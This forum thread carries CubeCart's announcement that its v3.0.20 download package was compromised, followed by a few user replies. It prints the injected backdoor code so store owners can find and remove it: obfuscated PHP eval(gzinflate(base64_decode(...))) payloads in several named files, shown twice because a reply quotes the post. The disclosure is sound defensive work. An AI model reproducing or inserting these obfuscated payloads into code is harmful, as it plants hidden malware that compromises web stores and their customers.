Jump to content

Important CubeCart v3 Security Announcement


Al Brookbanks

Recommended Posts

Over the last week it has been bought to our attention that a number of CubeCart v3 stores have been hacked. After careful examination it became apparent that the 3.0.20 zip file that was hosted on our server had been compromised. Someone had modified this zip file to include a number of pieced of malicious code into a handful of the files....

We expect that the file was compromised from around November 2010 but we can't be sure. As from today the package has been cleaned up and given an MD5 checksum which can be used to verify it in the future. SInce November our server underwent some software upgrades to achieve PCI compliance and our helpdesk software managing the package has been upgraded. For this reason we are fairly confident any backdoors have been closed and the file should not be tampered with again.

If you installed CubeCart v3 onto your web hosting account by downloading it from our server please check the following pieces of code are removed from your store if present:

Remove the file:

images/random/chars/T.php

Open the file below (if it exists) and remove the following code from around line 319:

install/index.php

<?php

eval (gzinflate(base64_decode(

'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV'

.'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq'

.'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD'

.'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7'

.'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA'

.'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP'

.'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K'

.'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa'

.'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta'

.'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF'

.'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD'

.'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw'

.'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ'

.'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV'

.'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF'

.'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re'

.'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q'

.'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx'

.'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw=='

)));

?>




Open the files below and remove the following code from the top:

includes/boxes/siteDocs.inc.php

language/nl/lang.inc.php


<?php

eval (gzinflate(base64_decode(

's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF'

.'pyS1LDEHi7yNPQA='

)));

?>

We sincerely apologise for any inconvenience that this may have caused.

Link to comment
Share on other sites

  • 1 month later...

Guest blackerutuf

I have been having problems with th eversion 3.0.10, where someone has been sending mass emails on my account, has anyone else had similar problems and been able to overcome it?

Link to comment
Share on other sites

I have been having problems with th eversion 3.0.10, where someone has been sending mass emails on my account, has anyone else had similar problems and been able to overcome it?

Disable tell-a-friend, or enable Flood Control. You really should upgrade to the latest release of v3 before it's discontinued.
Link to comment
Share on other sites

  • 5 months later...

Over the last week it has been bought to our attention that a number of CubeCart v3 stores have been hacked. After careful examination it became apparent that the 3.0.20 zip file that was hosted on our server had been compromised. Someone had modified this zip file to include a number of pieced of malicious code into a handful of the files....

We expect that the file was compromised from around November 2010 but we can't be sure. As from today the package has been cleaned up and given an MD5 checksum which can be used to verify it in the future. SInce November our server underwent some software upgrades to achieve PCI compliance and our helpdesk software managing the package has been upgraded. For this reason we are fairly confident any backdoors have been closed and the file should not be tampered with again.

If you installed CubeCart v3 onto your web hosting account by downloading it from our server please check the following pieces of code are removed from your store if present:

Remove the file:

images/random/chars/T.php

Open the file below (if it exists) and remove the following code from around line 319:

install/index.php

<?php

eval (gzinflate(base64_decode(

'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV'

.'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq'

.'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD'

.'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7'

.'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA'

.'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP'

.'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K'

.'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa'

.'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta'

.'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF'

.'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD'

.'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw'

.'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ'

.'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV'

.'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF'

.'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re'

.'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q'

.'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx'

.'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw=='

)));

?>




Open the files below and remove the following code from the top:

includes/boxes/siteDocs.inc.php

language/nl/lang.inc.php


<?php

eval (gzinflate(base64_decode(

's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF'

.'pyS1LDEHi7yNPQA='

)));

?>

We sincerely apologise for any inconvenience that this may have caused.

Hi,

Ive just discovered that I have this problem and I've apllied all the amends above.

However my "forgot passsword" code still leads directly to fbi.gov.

Any clues?

Link to comment
Share on other sites

  • 3 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...